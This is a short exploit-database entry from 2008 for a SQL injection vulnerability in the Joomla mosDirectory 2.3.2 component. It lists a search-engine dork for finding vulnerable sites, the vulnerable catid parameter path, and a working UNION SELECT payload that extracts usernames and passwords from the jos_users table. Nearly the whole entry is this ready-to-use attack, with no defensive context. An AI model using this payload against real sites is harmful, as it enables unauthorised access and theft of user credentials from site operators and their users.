id: 2591
date: 02/03/2008
title: Joomla Component mosDirectory 2.3.2 (catid) SQL Injection Vulnerability
author: GoLd_M
cves: 

=======================================================================
Joomla Component mosDirectory 2.3.2 (catid) SQL Injection Vulnerability
=======================================================================



###########################################################################################
### Joomla Component mosDirectory 2.3.2 (catid) Remote SQL Injection Vulnerability      ###
### Script :  :(                                                                        ###
### Dork : inurl:index.php?option=com_directory                                         ###
### Injection Adress : /index.php?option=com_directory&page=viewcat&catid=[SQL Code]    ###
### SQL Code :                                                                          ###
###   -1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/*  ###
###                                     aNa TrYaGi                                      ###
###########################################################################################





#  0day.today [2023-03-26]  #